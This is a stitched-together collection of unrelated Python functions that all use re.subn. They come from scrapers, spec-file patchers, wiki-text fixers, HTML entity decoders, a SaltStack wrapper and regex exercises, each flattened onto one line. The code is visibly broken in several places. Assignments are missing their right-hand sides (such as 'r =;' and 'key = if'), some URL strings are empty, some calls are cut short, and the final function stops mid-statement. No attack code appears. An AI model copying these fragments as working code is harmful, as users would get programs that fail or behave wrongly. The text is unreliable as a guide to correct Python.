def changeHeadFoot(file,header,footer): f = open (file, "r+b"); r =; ro= r; r1,c1 = re.subn(HF[0], header, r); r2,c2 = re.subn(HF[1], footer, r1); if ( (c1+c2) <= 0 ): print "-NO HEADR OR FOOTER ", file, " not changing...." f.close() return #print "---", ro , "====", r2, "++++" if ( ro == r2 ): print "-No changes needed - original was good: ", file f.close() return print('+CHANGING :' + file + " replaced Header:" + str(c1)+ " Footer: " +str(c2)) fbak = open (file+".bak", "w"); fbak.write(r) fbak.close();; f.write(r2) f.truncate() f.close();
def get_rss_entries(request, limit=5, template_name="lfc/tags/rss_ajax_entries.html"): """Loads the entries for rss_ajax tag. """ url = request.GET.get("url") feed = feedparser.parse(url) try: name = feed["feed"]["link"].split("/")[-1] except (KeyError, IndexError, AttributeError): return { "entries" : [], "link" : "", "LANGUAGE_CODE" : "", } entries = [] for entry in feed.entries[0:limit]: summary = entry.summary.replace("%s: " % name, "") summary = re.subn("#\S+", "", summary)[0] summary = re.subn("(http://\S+)", "<a href='\g<1>'>\g<1></a>", summary)[0] entries.append({ "summary" : summary, "date" : datetime.datetime(*entry["updated_parsed"][0:6]) }) return render_to_response(template_name, RequestContext(request, { "entries" : entries, "link" : feed["feed"]["link"], }))
def cm_process(line, mode=None): # if we're already in a critic markup deletion mode # check if we can exit the mode # if not, return nothing if mode: (line,nsub) = re.subn(cms[mode][2],'',line) if nsub==0: #return ('',mode) return (None,mode) # otherwise changes = dict() for k in cm_order: vs = cms[k] nsub = -1 if len(vs) == 1: # nonmodal critic markup: tag deletion while nsub != 0: (line, nsub) = re.subn(vs[0],'',line) elif len(vs) == 3: # modal critic markup: check if mode contained in line # or starts on line and continues past while nsub != 0: (line, nsub) = re.subn(vs[0],'',line) (line, nsub) = re.subn(vs[1],'',line) if nsub > 0: return(line,k) return (line,None)
def get_potential_addresses(address): """ Get permutations of as many potential addresses as we can make out of the given address. Permutations include the address with all punctuation removed, the address with directions abbreviated, and the address with street types abbreviated (as they are in the City of New Orleans' addresses shapefile). """ addresses = set() addresses.add(address.lower()) # Try removing punctuation from the address for address in list(addresses): addresses.add(re.subn('[^\s\w]', '', address)[0]) # Try abbreviating directions for address in list(addresses): abbreviated = address for direction, abbr in directions.items(): abbreviated = re.subn(r'\b%s\b' % direction, abbr, abbreviated)[0] addresses.add(abbreviated) # Abbreviate street types for address in list(addresses): for street_type, abbr in street_types.items(): abbreviated = re.subn(r'\b%s\b' % street_type, abbr, address)[0] addresses.add(abbreviated) return tuple(addresses)
def alter_path(self, path, **varargs): '''Modify the path passed so that it can be executed on the remote host path = path to modify regexp_substitution - if true, exclude \g<...> from substitution ''' regexp_substitution = varargs.get("regexp_substitution", False) for mapping in self.mappings: local_directory = mapping.local_directory.value remote_directory = mapping.remote_directory.value if regexp_substitution: local_directory = local_directory.replace("\\", "\\\\") remote_directory = remote_directory.replace("\\", "\\\\") if sys.platform.startswith('win'): # Windows is case-insentitve so do case-insensitve mapping if path.upper().startswith(local_directory.upper()): path = (remote_directory + path[len(local_directory):]) else: if path.startswith(local_directory): path = (remote_directory + path[len(local_directory):]) if self.remote_host_is_windows.value: path = path.replace('/','\\') elif (regexp_substitution): path = re.subn('\\\\\\\\','/',path)[0] path = re.subn('\\\\(?!g\\<[^>]*\\>)','/',path)[0] else: path = path.replace('\\','/') return path
def getComments(self, response): Item = response.meta['item'] res_text = response.body_as_unicode().encode('ascii', 'ignore') res_text = smart_str(self.parser.unescape(self.parser.unescape(res_text))).replace('\xc2\xa0','') res_text = res_text.replace('\n', ' ').replace('\t', ' ').replace('\r', '') res_text = re.subn('<script.*?</script>', '', res_text)[0] res_text = re.subn('<style.*?</style>', '', res_text)[0] hxs = HtmlXPathSelector(text=res_text) tmp ='//div[@id="ds_div"]//text()').extract() comments = '' for val in tmp: val = val.strip() if val != '': comments += val + ' ' Item['Comments'] = comments try: offers_url = '' + Item['eBay_Item_Number'] if Item['eBay_Item_Number'] != 'NA' and Item['eBay_Item_Number'] != '': req = Request(offers_url, dont_filter=True, callback=self.getPostingDate) req.meta['item'] = Item return req except: pass return Item
def html2utf8(self,in_html): in_html = (re.subn(r'<(script).*?</\1>(?s)', '', in_html)[0]) in_html = (re.subn(r'<(style).*?</\1>(?s)', '', in_html)[0]) entitydict = {} entities = re.finditer('&([^#][A-Za-z]{1,5}?);', in_html) for x in entities: key = if key not in entitydict: entitydict[key] = htmlentitydefs.name2codepoint[] entities = re.finditer('&#x([0-9A-Fa-f]{2,2}?);', in_html) for x in entities: key = if key not in entitydict: entitydict[key] = "%d" % int(key[3:5], 16) entities = re.finditer('&#(\d{1,5}?);', in_html) for x in entities: key = if key not in entitydict: entitydict[key] = if"charset=utf-8", in_html): for key, codepoint in iteritems(entitydict): in_html = in_html.replace(key, unichr(int(codepoint))) self.inhtml = in_html.encode('utf8') return for key, codepoint in iteritems(entitydict): in_html = in_html.replace(key, unichr(int(codepoint)).encode('latin-1', 'ignore')) self.inhtml = in_html.decode('latin-1').encode('utf8')
def __call__(self, parser, namespace, values, option_string=None): if is_interactive() and option_string == '--help': # lets use the manpage on mature systems ... try: import subprocess subprocess.check_call( 'man %s 2> /dev/null' % parser.prog.replace(' ', '-'), shell=True) sys.exit(0) except (subprocess.CalledProcessError, OSError): # ...but silently fall back if it doesn't work pass if option_string == '-h': helpstr = "%s\n%s" % ( parser.format_usage(), "Use '--help' to get more comprehensive information.") else: helpstr = parser.format_help() # better for help2man # For main command -- should be different sections. And since we are in # heavy output massaging mode... if "commands for dataset operations" in helpstr.lower(): opt_args_str = '*Global options*' pos_args_str = '*Commands*' # tune up usage -- default one is way too heavy helpstr = re.sub('^[uU]sage: .*?\n\s*\n', 'Usage: datalad [global-opts] command [command-opts]\n\n', helpstr, flags=re.MULTILINE | re.DOTALL) # And altogether remove section with long list of commands helpstr = re.sub(r'positional arguments:\s*\n\s*{.*}\n', '', helpstr) else: opt_args_str = "*Options*" pos_args_str = "*Arguments*" helpstr = re.sub(r'optional arguments:', opt_args_str, helpstr) helpstr = re.sub(r'positional arguments:', pos_args_str, helpstr) # convert all heading to have the first character uppercase headpat = re.compile(r'^([a-z])(.*):$', re.MULTILINE) helpstr = re.subn( headpat, lambda match: r'{0}{1}:'.format(,, helpstr)[0] # usage is on the same line helpstr = re.sub(r'^usage:', 'Usage:', helpstr) if option_string == '--help-np': usagestr = re.split(r'\n\n[A-Z]+', helpstr, maxsplit=1)[0] usage_length = len(usagestr) usagestr = re.subn(r'\s+', ' ', usagestr.replace('\n', ' '))[0] helpstr = '%s\n%s' % (usagestr, helpstr[usage_length:]) if os.environ.get('DATALAD_HELP2MAN'): # Convert 1-line command descriptions to remove leading - helpstr = re.sub('\n\s*-\s*([-a-z0-9]*):\s*?([^\n]*)', r"\n'\1':\n \2\n", helpstr) else: # Those *s intended for man formatting do not contribute to readability in regular text mode helpstr = helpstr.replace('*', '') print(helpstr) sys.exit(0)
def replace(inp): result = [] for f in inp: f = f.decode("utf-8") #f = re.sub(r"([^\\])([_|\^])", r"\1\\\2", f) # do not require backslash in front of ^ or _ #f = re.sub(r"^([_|\^])", r"\\\1", f) # escape combining marks with a space after the backslash for c in combiningmarks: offset = 0 for s in re.finditer(c[0], f): f = f[:s.start()+1+offset] + " " + f[s.start()+1+offset:] offset += 1 for r in replacements: f = re.sub(r[0], r[1], f) # expand groups of subscripts: \_{01234} offset = 0 #for s in re.finditer(r"\\_\{[^\}]+\}", f): for s in re.finditer(ur"_\{[0-9\+-=\(\)<>\-aeoxjhklmnpstiruv\u03B2\u03B3\u03C1\u03C6\u03C7]+\}", f): newstring,n = re.subn(ur"([0-9\+-=\(\)<>\-aeoxjhklmnpstiruv\u03B2\u03B3\u03C1\u03C6\u03C7])", r"_\1",[2:-1]) f = f[:s.start()+offset] + newstring + f[s.end()+offset:] offset += n*2 - (n + 3) # expand groups of superscripts: \^{01234} offset = 0 #for s in re.finditer(r"\\\^\{[^\}]+\}", f): for s in re.finditer(ur"\^\{[0-9\+-=\(\)<>ABDEGHIJKLMNOPRTUWabcdefghijklmnoprstuvwxyz\u03B2\u03B3\u03B4\u03C6\u03C7\u222B]+\}", f): newstring,n = re.subn(ur"([0-9\+-=\(\)<>ABDEGHIJKLMNOPRTUWabcdefghijklmnoprstuvwxyz\u03B2\u03B3\u03B4\u03C6\u03C7\u222B])", r"^\1",[2:-1]) f = f[:s.start()+offset] + newstring + f[s.end()+offset:] offset += n*2 - (n + 3)
def set_new_patches(self, fns): self.wipe_patches() if not fns: return apply_method = self.patches_apply_method() ps = '' pa = '' for i, pfn in enumerate(fns, start=1): ps += "Patch%04d: %s\n" % (i, pfn) if apply_method == 'rpm': pa += "%%patch%04d -p1\n" % i ## PatchXXX: lines after Source0 / #patches_base= self._txt, n = re.subn( self.RE_AFTER_PATCHES_BASE, r'\g<1>%s\n' % ps, self.txt, count=1) if n != 1: self._txt, n = re.subn( self.RE_AFTER_SOURCES, r'\g<1>%s\n' % ps, self.txt, count=1) if n != 1: raise Exception("SpecFileParseError: Failed to append PatchXXXX: lines") ## %patchXXX -p1 lines after "%setup" if needed if apply_method == 'rpm': self._txt, n = re.subn( r'((?:^|\n)%setup[^\n]*\n)\s*', r'\g<1>\n%s\n' % pa, self.txt) if n == 0: raise Exception("SpecFileParseError: Failed to append %patchXXXX lines after %setup")
def retrieveEspnGameIdsForDay(date, root_url): """ """ url = root_url + date url = "" scores_page = soupypages.soupFromUrl(url) if scores_page['pass']: scores_page = scores_page['soup'] game_data = scores_page.body.findAll(id="main-container")[0].find('div', class_='scoreboards').attrs['data-data'] game_data = re.subn('true', "'true'", game_data)[0] game_data = re.subn('false', "'false'", game_data)[0] game_data = eval(game_data) game_ids = [game['id'] for game in game_data['events']] return game_ids ## scores_page = makePage(url, hdr=True) ## if scores_page['pass']: ## game_ids = key_phrase.findall(scores_page['page']) ## return game_ids else: err_msg = scores_page['err'] if type(err_msg) == str: print("Failed to retrieve scores page for %s. Error: %s" %\ (date, err_msg)) else: print("Failed to retrieve scores page for %s. Unknown error." %\ date) return []
def cache_customevent_trend(ids=[]): """ Runs the rawdata gatherer for the specific custom events. Intended to be run mainly but the BibSched daemon interface. For a specific id, all possible timespans' rawdata is gathered. @param ids: The custom event ids that are subject to caching. @type ids: [] """ args = {} timespans = _get_timespans() for id in ids: args['id'] = id args['cols'] = [] for i in range(len(timespans)): # Get timespans parameters args['timespan'] = timespans[i][0] args.update({ 't_start': timespans[i][2], 't_end': timespans[i][3], 'granularity': timespans[i][4], 't_format': timespans[i][5], 'xtic_format': timespans[i][6] }) # Create unique filename for this combination of parameters filename = "webstat_customevent_%(id)s_%(timespan)s" \ % { 'id': re.subn("[^\w]", "_", id)[0], 'timespan': re.subn("[^\w]", "_", args['timespan'])[0] } # Create closure of gatherer function in case cache needs to be refreshed gatherer = lambda: get_customevent_trend(args) # Get data file from cache, ALWAYS REFRESH DATA! _get_file_using_cache(filename, gatherer, True).read() return True
def alter_path(self, path, **varargs): '''Modify the path passed so that it can be executed on the remote host path = path to modify regexp_substitution - if true, exclude \g<...> from substitution ''' for mapping in self.mappings: if sys.platform.startswith('win'): # Windows is case-insentitve so do case-insensitve mapping if path.upper().startswith(mapping.local_directory.value.upper()): path = (mapping.remote_directory.value + path[len(mapping.local_directory.value):]) else: if path.startswith(mapping.local_directory.value): path = (mapping.remote_directory.value + path[len(mapping.local_directory.value):]) if self.remote_host_is_windows.value: path = path.replace('/','\\') elif (varargs.has_key("regexp_substitution") and varargs["regexp_substitution"]): path = re.subn('\\\\\\\\','/',path)[0] path = re.subn('\\\\(?!g\\<[^>]*\\>)','/',path)[0] else: path = path.replace('\\','/') return path
def _clean_xml(self, line): line2 = re.subn('"', '"', line) line3 = re.subn('&', '&', line2[0]) line4 = re.subn("'", ''', line3[0]) line5 = re.subn('<', '<', line4[0]) line6 = re.subn('>', '>', line5[0]) return line6[0]
def set_new_patches(self, fns): self.wipe_patches() if not fns: return apply_method = self.patches_apply_method() ps = "" pa = "" for i, pfn in enumerate(fns, start=1): ps += "Patch%04d: %s\n" % (i, pfn) if apply_method == "rpm": pa += "%%patch%04d -p1\n" % i # PatchXXX: lines after Source0 / #patches_base= self._txt, n = re.subn(self.RE_AFTER_PATCHES_BASE, r"\g<1>%s\n" % ps, self.txt, count=1) if n != 1: for m in re.finditer(self.RE_AFTER_SOURCES, self.txt): pass if not m: raise exception.SpecFileParseError(spec_fn=self.fn, error="Failed to append PatchXXXX: lines") i = m.end() startnl, endnl = "", "" if self._txt[i - 2] != "\n": startnl += "\n" if self._txt[i] != "\n": endnl += "\n" self._txt = self._txt[:i] + startnl + ps + endnl + self._txt[i:] # %patchXXX -p1 lines after "%setup" if needed if apply_method == "rpm": self._txt, n = re.subn(r"((?:^|\n)%setup[^\n]*\n)\s*", r"\g<1>\n%s\n" % pa, self.txt) if n == 0: raise exception.SpecFileParseError( spec_fn=self.fn, error="Failed to append %patchXXXX lines after %setup" )
def parse(self, response): response_sel = Selector(response) category = response_sel.xpath(u'//a[contains(@href,"category")]/@href').extract() sellerid = response_sel.xpath(u'//meta[contains(@content,"userId")]/@content').extract() # get the sellerid and replace it sellerId = re.findall(r'userId=(\d+)', sellerid[0])[0] if sellerId: self.rateUrl = set_query(self.rateUrl, sellerId=sellerId) else: self.logger.error("Get the sellerid error !") domain = re.findall(r'https:(.*)', response.url)[0] if domain: # replace the request page domain self.categoryUrl, result_count = re.subn(r'//(.*?)/', domain, self.categoryUrl) self.asyncUrl, result_count = re.subn(r'//(.*?)/', domain, self.asyncUrl) else: self.logger.error("Get the request domain error!") all_category = set() for category_url in category: category_id = re.findall(r'category-(\d+).htm', category_url) if category_id: all_category.add(category_id[0]) for category_id in all_category: # set the category id result_url, result_count = re.subn(r'(\d+\d+)', category_id, self.categoryUrl)"category url : %s", result_url) yield Request(url=result_url, callback=self.parse_category)
def subst(self, replace, replace_with): "re search and replace on the current node" nodes = self.current_nodes[:] check = len(nodes) == 1 a = self.current_attrib if a: new, num = re.subn(replace, replace_with, a.value) if not num: raise Beep a = self.model.set_attrib(nodes[0],, new) self.move_to(nodes[0], a) else: self.move_to([]) final = [] for n in nodes: if n.nodeType == Node.TEXT_NODE: old ='\n', ' ') new, num = re.subn(replace, replace_with, old) if check and not num: self.move_to(n) raise Beep self.model.set_data(n, new) final.append(n) elif n.nodeType == Node.ELEMENT_NODE: old = str(n.nodeName) new, num = re.subn(replace, replace_with, old) if check and not num: self.move_to(n) raise Beep new_ns, x = self.model.split_qname(n, new) final.append(self.model.set_name(n, new_ns, new)) else: self.move_to(n) raise Beep self.move_to(final)
def main(inputpath): total_diff = 0 second_diff = 0 for l in ( _l.strip() for _l in open(inputpath, "r") ): code_count = len(l) content = l[1:-1] content, _ = re.subn(r'\\x[a-f0-9][a-f0-9]', '!', content) content = content.replace(r'\\', '@') content = content.replace(r'\"', '#') mem_count = len(content) # print l, code_count, mem_count, (code_count - mem_count) total_diff += (code_count - mem_count) # Turn each character into a number that we'll sum up at the end. orig_count = len(l) content = "1" + l + "1" content, _ = re.subn(r'\\x[a-f0-9][a-f0-9]', '5', content) content = content.replace('"', '2') content = content.replace('\\', '2') content, _ = re.subn(r'[a-z]', '1', content) exploded_count = sum( int(c) for c in content ) second_diff += (exploded_count - orig_count) print l, content, exploded_count print total_diff, second_diff
def html2utf8(self,in_html): in_html = (re.subn(r'<(script).*?</\1>(?s)', '', in_html)[0]) in_html = (re.subn(r'<(style).*?</\1>(?s)', '', in_html)[0]) entitydict = {} entities = re.finditer('&([:_A-Za-z][:_\-.A-Za-z"0-9]*);', in_html) for x in entities: key = if key not in entitydict: entitydict[key] = htmlentitydefs.name2codepoint[] entities = re.finditer('&#x([0-9A-Fa-f]+);', in_html) for x in entities: key = if key not in entitydict: entitydict[key] = "%d" % int(, 16) entities = re.finditer('&#(\d+);', in_html) for x in entities: key = if key not in entitydict: entitydict[key] = if 'charset="utf-8"' in in_html or 'charset=utf-8' in in_html: for key, codepoint in iteritems(entitydict): in_html = in_html.replace(key, unichr(int(codepoint)).encode('utf8')) self.inhtml = in_html return for key, codepoint in iteritems(entitydict): in_html = in_html.replace(key, unichr(int(codepoint)).encode('latin-1', 'ignore')) self.inhtml = in_html.decode('latin-1').encode('utf8')
def __init__(cls, name, bases, attrs): cls.registry = copy.deepcopy(getattr(cls, 'registry', {'mappers': {}, 'types': {}})) def add_mapper(f, ff, fft): log.debug("{} adding mapper {} for {} ({})", cls.__name__, f, ff, fft) if f in cls.registry: log.warning("Overwriting {} for class {} with {} " "(previous value: {})", f, name, ff, cls.registry['mappers'][f]) cls.registry['mappers'][f] = ff cls.registry['types'][ff] = fft # get form_field mappers from dunder string form_field_mappers = getattr(cls, '__form_fields__', {}) for field, (form_field, form_field_type) in form_field_mappers.items(): add_mapper(field, form_field, form_field_type) for key, val in attrs.items(): try: form_field, form_field_type = getattr(val, 'form_field') except AttributeError: pass # most attributes are not a form_field mapper else: field, n = re.subn(re_frender, '', key) assert n == 1 # only then is it a field renderer add_mapper(field, form_field, form_field_type) # get fields that need finalization if getattr(val, 'needs_finalization', False): field, n = re.subn(re_frender, '', key) assert n == 1 # only then is it a field renderer cls._to_finalize = getattr(cls, '_to_finalize', []) + [field]
def book_searched(context, result): book = Book.objects.get(pk=result.book_id) # snippets = [] # for hit in result.hits: # if hit['snippets']: # snippets.append(hit['snippets']) # elif hit['fragment']: # snippets.append(hit['fragment'].short_text) # We don't need hits which lead to sections but do not have # snippets. hits = filter(lambda (idx, h): result.snippets[idx] is not None or 'fragment' in h, enumerate(result.hits)) # print "[tmpl: from %d hits selected %d]" % (len(result.hits), len(hits)) for (idx, hit) in hits: # currently we generate one snipper per hit though. if result.snippets[idx] is None: continue snip = result.snippets[idx] # fix some formattting snip = re.subn(r"(^[ \t\n]+|[ \t\n]+$)", u"", re.subn(r"[ \t\n]*\n[ \t\n]*", u"\n", snip)[0])[0] snip = snip.replace("\n", "<br />").replace('---', '—') hit['snippet'] = snip return { 'request': context['request'], 'book': book, 'hits': hits and zip(*hits)[1] or [] }
def get_region(sequence, f_primer, r_primer): refhvr_cut_t = () refhvr_cut = "" re_f_primer = '^.+' + f_primer re_r_primer = r_primer + '.+' hvrsequence_119_1_t = re.subn(re_f_primer, '', sequence) # print hvrsequence_119_1_t if (hvrsequence_119_1_t[1] > 0): refhvr_cut_t = re.subn(re_r_primer, '', hvrsequence_119_1_t[0]) # print refhvr_cut_t if (refhvr_cut_t[1] > 0): refhvr_cut = refhvr_cut_t[0] else: if (verbose): print "Can't find reverse primer %s in %s" % (r_primer, sequence) refhvr_cut = "" else: if (verbose): print "Can't find forward primer %s in %s" % (f_primer, sequence) refhvr_cut = "" return refhvr_cut
def chop_end(seqs, model_end, min_modelpositions): chop_seq_dict = dict() refseq = seqs[refseq_ID] model_pos = 0 model_map = dict() for i in range(len(refseq.seq)): if refseq.seq[i] != ".": model_pos += 1 model_map[model_pos] = i seq_end = model_map[model_end] for seqid in seqs.keys(): seq = seqs[seqid] ## slice from the end seqstr = str(seq.seq)[0: seq_end] if seqid != refseq_ID: # check if the upper case chars( model position) pass the minimum requirement if len(re.subn(upper_regex, "", seqstr)[0]) >= min_modelpositions: chop_seq_dict[seqid] = seqstr else: print "%s length %s %s" % (, len(re.subn(upper_regex, "", seqstr)[0]), re.subn(upper_regex, "", seqstr)[0]) pass else: chop_seq_dict[seqid] = seqstr return chop_seq_dict
def error_027_mnemonic_codes(text): """Fix some cases and return (new_text, replacements_count) tuple.""" (text, ignored) = ignore(text, r"https?://\S+") (text, count1) = re.subn(r"–", "–", text) (text, count2) = re.subn(r" ", " ", text) text = deignore(text, ignored) return (text, count1 + count2)
def error_032_link_two_pipes(text): """Fix some cases and return (new_text, replacements_count) tuple.""" (text, ignored) = ignore(text, r"\[\[\s*:?\s*{}.*?\]\]".format(IMAGE)) (text, count1) = re.subn(r"\[\[([^|\[\]\n]+)\|\|([^|\[\]\n]+)\]\]", "[[\\1|\\2]]", text) (text, count2) = re.subn(r"\[\[([^|\[\]\n]+)\|([^|\[\]\n]+)\|\]\]", "[[\\1|\\2]]", text) text = deignore(text, ignored) return (text, count1 + count2)
def shell_remote_execution(self, tgt, arg, arg1): ''' Shell command execution with parameters ''' if arg in ['disk.usage', 'network.interfaces', 'grains.items', '', 'state.running', 'status.meminfo', 'status.uptime', 'service.get_all']: params = {'client': 'local', 'tgt': tgt, 'fun': arg, 'expr_form': 'list'} elif arg == '': params = {'client': 'local', 'tgt': tgt, 'fun': arg, 'arg1': arg1, 'arg2': 'runas=weihu','expr_form': 'list'} obj = urllib.urlencode(params) obj, number = re.subn("arg\d", 'arg', obj) content = self.postRequest(obj) ret = content['return'][0] return ret elif arg in ['cp.get_file', 'cp.get_dir', 'cp.get_url']: a = arg1.split() a1 = a[0] a2 = a[1] params = {'client': 'local', 'tgt': tgt, 'fun': arg, 'arg1': a1, 'arg2': a2, 'expr_form': 'list'} obj = urllib.urlencode(params) obj, number = re.subn("arg\d", 'arg', obj) content = self.postRequest(obj) ret = content['return'][0] return ret else: params = {'client': 'local', 'tgt': tgt, 'fun': arg, 'arg': arg1, 'expr_form': 'list'} obj = urllib.urlencode(params) content = self.postRequest(obj) ret = content['return'][0] return ret
def build_template_tags(blocks): content = StringIO() block_template = ''' {%% block %(name)s %%} %(comment)s Default: %(default_value)s %(blocks)s {%% endblock %(name)s %%} ''' for block in blocks: subblocks = re.subn("\n", "\n\t", build_template_tags(block.blocks)) if subblocks: subblocks = subblocks[0] content.write(block_template % { 'name':, 'comment': block.comment, 'default_value': re.subn("\n", "\n\t", str(block.default_value))[0], 'blocks': subblocks, }) return content.getvalue()
def fixrow(data, key, methoddict, verify_rules, equationdict, originaldata): """function that i wrote to fix rows that were causing problems after results were created. after i did this it was clearly a problem because i had no way of knowing what caused the error. because of this i reworked ther interpolation script to allow for fixes in there rather than after the fact""" originaldata = {k: v for k, v in chain(originaldata['blockdata'].items(), originaldata['tractdata'].items())} def subber(matchobject): return '{:d}'.format(originaldata[]) for table, method in methoddict.items(): testdict = verify_rules[str(method)] tabledata = {k.split('_')[-1][2:]: v for k, v in data.items() if table in k} for total, components in sorted(testdict.items(), key = lambda x: int(x[0])): result, valtotal, valcomps = testrule(tabledata, total, components) if result == 'mult': totalname = '{0}_av{1}'.format(table, total) if table == 'ds185_dt31': print key, totalname, 'total', re.subn(FINDVARIABLES, subber, equationdict[totalname]['equation'])[0], valtotal valcomps = {k: v for k, v in valcomps.iteritems() if v == valtotal} lengthcomps = len(valcomps) for val in valcomps: tabledata[val] = float(valtotal) / lengthcomps fullname = '{0}_av{1}'.format(table, val) if table == 'ds185_dt31': print key, fullname, 'value', re.subn(FINDVARIABLES, subber, equationdict[fullname]['equation'])[0], tabledata[val] data[fullname] = float(valtotal) / lengthcomps return data
def getDefaultEditionContent(): '''获取标准版文件内容 Returns: 标准版文件内容 ''' partContent = '' for fileName in devPartFileNameList: partContent += open(devDirName + os.sep + fileName + '.js', 'r', encoding = encoding).read() + '\n\n' content = open(devDirName + os.sep + devKFOLFileName + userScriptExt, 'r', encoding = encoding).read() match ='/\*\s*\{PartFileContent\}\s*\*/', content, flags=re.S | re.I) if match: content = content.replace(, partContent) else: raise Exception('未找到{PartFileContent}占位符') content, num = re.subn(r'(// @description.+?)(// @include)', r'\g<1>' '// @updateURL\n' '// @downloadURL\n' r'\g<2>', content, count=1, flags=re.S | re.I) if num == 0: raise NoFoundReplaceStringError('标准版', 1) content, num = re.subn(r'// @require.+?(// @version)', '\g<1>', content, count=1, flags=re.S | re.I) if num == 0: raise NoFoundReplaceStringError('标准版', 2) return content
def geturllist(self,url): #将文档中包含的url通通加入到url列表中等待访问 tmpurl=re.findall('<a\s+[^>]*[\s]*href[\s]*=[\s]*[\'\"]([^>^\'^\"]*)[\'\"][\s]*[^>]*>',str(self.gethtmldom(url)))#匹配文档中的url domain=re.findall(r'^(?:https?://)?[\w\.]*',self.url);#获取该网页的域名 for x in tmpurl: x=re.subn('^\s*','',x)[0] #将url中的开头空白字符去掉 x=re.subn(r'\\','/',x)[0] #所有\换成/ if re.match('http',x,re.I): #如果该连接是以http开头的,丢进待访问列表 sitedomain=re.findall(r'^(?:https?://)?[\w\.]*',x) if self.allnet!=0 or sitedomain[0]==domain[0]: self.urllist.append(x) else: pass elif re.match('^//',x,re.I):#如果该连接是以//开头,加上http丢入列表 x='http:'+x sitedomain=re.findall(r'^(?:https?://)?[\w\.]*',x) if self.allnet!=0 or sitedomain[0]==domain[0]: self.urllist.append(x) else: pass elif len(re.findall('^#',x))!=0:#如果是锚点就丢弃 pass else: #不然加上判断是不是绝对路径 if len(re.findall('^/',x))!=0: #如果是绝对路径就加上域名丢进等待列表 x=domain[0]+x self.urllist.append(x) else: if url==domain[0]: x=url+'/'+x self.urllist.append(x); else: x=re.subn(r'(/[^/]*)$','/'+x,url)[0] self.urllist.append(x) return self.urllist
def _datetime(reader, elem): text, n = re.subn(r"(.*\.)(\d{6})\d+(\+.*)", r"\1\2\3", elem.text) if n > 0: log.debug(f"Truncate sub-microsecond time in <{QName(elem).localname}>") reader.push(elem, isoparse(text))
def split_header_words(header_values): r"""Parse header values into a list of lists containing key,value pairs. The function knows how to deal with ",", ";" and "=" as well as quoted values after "=". A list of space separated tokens are parsed as if they were separated by ";". If the header_values passed as argument contains multiple values, then they are treated as if they were a single value separated by comma ",". This means that this function is useful for parsing header fields that follow this syntax (BNF as from the HTTP/1.1 specification, but we relax the requirement for tokens). headers = #header header = (token | parameter) *( [";"] (token | parameter)) token = 1*<any CHAR except CTLs or separators> separators = "(" | ")" | "<" | ">" | "@" | "," | ";" | ":" | "\" | <"> | "/" | "[" | "]" | "?" | "=" | "{" | "}" | SP | HT quoted-string = ( <"> *(qdtext | quoted-pair ) <"> ) qdtext = <any TEXT except <">> quoted-pair = "\" CHAR parameter = attribute "=" value attribute = token value = token | quoted-string Each header is represented by a list of key/value pairs. The value for a simple token (not part of a parameter) is None. Syntactically incorrect headers will not necessarily be parsed as you would want. This is easier to describe with some examples: >>> split_header_words(['foo="bar"; port="80,81"; discard, bar=baz']) [[('foo', 'bar'), ('port', '80,81'), ('discard', None)], [('bar', 'baz')]] >>> split_header_words(['text/html; charset="iso-8859-1"']) [[('text/html', None), ('charset', 'iso-8859-1')]] >>> split_header_words([r'Basic realm="\"foo\bar\""']) [[('Basic', None), ('realm', '"foobar"')]] """ assert type(header_values) not in STRING_TYPES result = [] for text in header_values: orig_text = text pairs = [] while text: m = if m: text = unmatched(m) name = m = if m: # quoted value text = unmatched(m) value = value = escape_re.sub(r"\1", value) else: m = if m: # unquoted value text = unmatched(m) value = value = value.rstrip() else: # no value, a lone token value = None pairs.append((name, value)) elif text.lstrip().startswith(","): # concatenated headers, as per RFC 2616 section 4.2 text = text.lstrip()[1:] if pairs: result.append(pairs) pairs = [] else: # skip junk non_junk, nr_junk_chars = re.subn("^[=\s;]*", "", text) assert nr_junk_chars > 0, ( "split_header_words bug: '%s', '%s', %s" % (orig_text, text, pairs)) text = non_junk if pairs: result.append(pairs) return result
from utilities import db
import re ''' 1.表示浮点数的正则表达式 -?有可能存在问号 \d+ 任意多的数字 (\.\d+)? 有可能有.数字 也可能没有 2.格式化浮点数 format 3.如何替换原来的浮点数 sub(只返回替换结果) subn (返回元组,不仅有替换结果还有替换次数) ''' result = re.subn('-?\d+(\.\d+)', '##', 'PI is 3.141592654,e is 2.71828183. -0.2 + 1.3 =1.1') print(result) # 将所有浮点数替换成## print(result[0]) print(result[1]) def fun(matched): return format(float(, '0.2f') result = re.subn('-?\d+(\.\d+)', fun, 'PI is 3.141592654,e is 2.71828183. -0.2 + 1.3 =1.1') print(result)
def filter(self, text): s = text for (pattern, repl) in self.patterns: (s, count) = re.subn(pattern, repl, s) return s
match1 =, string11) match2 =, string12) if match1: print("{} matched pattern {}!".format(string11, pattern1)) if match2: print("{} matched pattern {}!".format(string12, pattern1)) # QUESTION 2 string21 = "Herecomesthe12.35kl;j;negative-12.35dj;lad" pattern2 = r"-?[0-9]*\.[0-9]+" # matches [.99 01.999 -1.1 etc] not integers/chars sub = re.sub(pattern2, "float", string21) print(sub) # QUESTION 3 string21 = "Herecomesthe12.35kl;j;negative-12.35dj;lad" pattern2 = r"-?[0-9]*\.[0-9]+" sub = re.subn(pattern2, "float", string21) print(sub[1]) # QUESTION 4 string4 = "12jkld;jafl;d-12jda;lsfja5dk;alsf6dafj;14" pattern4 = r"-?[0-9]+" integers = re.findall(pattern4, string4) print(sum([int(x) for x in integers])) # QUESTION 5 string5 = "EE364EE364EE364" pattern5 = r"EE364" newstring5 = re.sub(pattern5, "EE461", string5, 1) print(newstring5) # QUESTION 6
def buildTranslation(lang, extend=False, langPath=None): """Finds the file corresponding to 'lang' builds up string_cache. If the file is not valid, does nothing. Errors encountered during the process are silently ignored. Returns string_cache (dict) and wether the file exists (bool).""" log.debug("buildTranslation <<<") tm = time() if not langPath: langPath = getLangPath() #str_cache = {} global string_cache fileFound = False lang = u"%s" % lang fName = os.path.join(langPath, lang + ".trn") log.debug("fName: %s" % fName) if os.access(fName, os.F_OK) and os.path.isfile(fName) and os.access(fName, os.R_OK): fileFound = True rawData =, "r", "utf-8").read() log.debug("fName is valid and read.") log.debug("Type of file data is %s"%("%s"%type(rawData)).strip("<type '").strip(">")[:-1]) log.debug("Parsing file and building JSON resource.") log.debug(" * Start on %s"%tm) start ="^o\d+[ ]", rawData, re.M|re.S) if start: start = start.start() else: log.warning(" *** %s malformed. Could not find entry point.\n Translation not loaded.") # exiting without further operations return {}, False data = rawData[start:] trnPattern = re.compile(r"^o\d+[ ]|^t\d+[ ]", re.M|re.S) grps = re.findall(trnPattern, data) if len(grps) % 2 != 0: grps1 = 